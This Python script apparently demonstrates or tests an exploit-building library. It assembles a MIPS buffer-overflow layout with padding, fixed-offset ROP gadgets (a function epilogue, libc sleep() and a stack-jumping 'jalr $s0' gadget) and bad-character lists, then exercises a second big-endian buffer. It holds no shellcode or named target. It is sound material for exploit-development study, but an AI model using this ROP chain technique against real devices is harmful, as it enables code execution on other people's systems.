# Pick the libc base for the target: the qemu value when running under qemu,
# otherwise the value observed on the real device.
libc_base = libc_qemu_base if qemu else libc_actual_base

# Passed to the buffer as badchars; presumably values the buffer must not
# contain (mixed str/int entries kept exactly as the original author wrote them).
badchars = ['\0', 0x0d, '\n', 0x20]

buf = EmptyOverflowBuffer(
    LittleEndian,
    default_base=libc_base,
    badchars=badchars,
    maxlength=2048,
)

# Leading padding, then the function-epilogue gadget that goes in $ra.
buf.add_pattern(528)
buf.add_rop_gadget(0x31b44, description="[$ra] function epilogue that sets up $s1-$s7")

# Remaining gadgets, each placed at a fixed offset: pad up to the offset,
# then append the gadget.  Order and values are as in the original layout.
_layout = (
    # address of sleep
    (620, 0x506c0, "Address of sleep() in libc. be sure to set up $ra and $a0 before calling."),
    # placeholder address that can be dereferenced without crashing, this goes in $s2
    (628, 0x427a4, "[$s2] placeholder, derefed without crashing."),
    # stackjumper. jalr $s0
    (644, 0x1ffbc, "[$s0] stackjumper"),
)
for target_offset, gadget_addr, gadget_desc in _layout:
    buf.add_pattern(target_offset - buf.len())
    buf.add_rop_gadget(gadget_addr, description=gadget_desc)
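# Second, big-endian buffer; exercises the same section-adding calls with a
# different badchars list.
buf2 = EmptyOverflowBuffer(BigEndian, badchars=['A', 'B', '6'])


def _try_add_section(add_section):
    """Run one section-adding callable, logging a warning instead of raising.

    Args:
        add_section: zero-argument callable that appends a section to buf2.
            The callable (including any argument it computes, e.g. a call to
            buf2.len()) runs inside the try so a failure anywhere in it is
            logged rather than propagated, matching the original per-call
            try/except blocks.
    """
    try:
        add_section()
    except Exception as e:
        logger.LOG_WARN("Failed to add section.")
        logger.LOG_WARN(str(e))


# Each step keeps its original argument; the thunks only remove the four
# copy-pasted try/except/LOG_WARN blocks.
_try_add_section(lambda: buf2.add_pattern(128))
_try_add_section(lambda: buf2.add_string('A' * 128))
_try_add_section(lambda: buf2.add_rop_gadget(0x4dc46fa0))
# Pad up to 1024 bytes total; buf2.len() is evaluated inside the try.
_try_add_section(lambda: buf2.add_pattern(1024 - buf2.len()))

logger.LOG_INFO("Length of second empty overflow buffer: %d" % buf2.len())
buf2.print_section_descriptions()
# Parenthesised single-argument form works under both Python 2 and 3.
print(buf2.pretty_string())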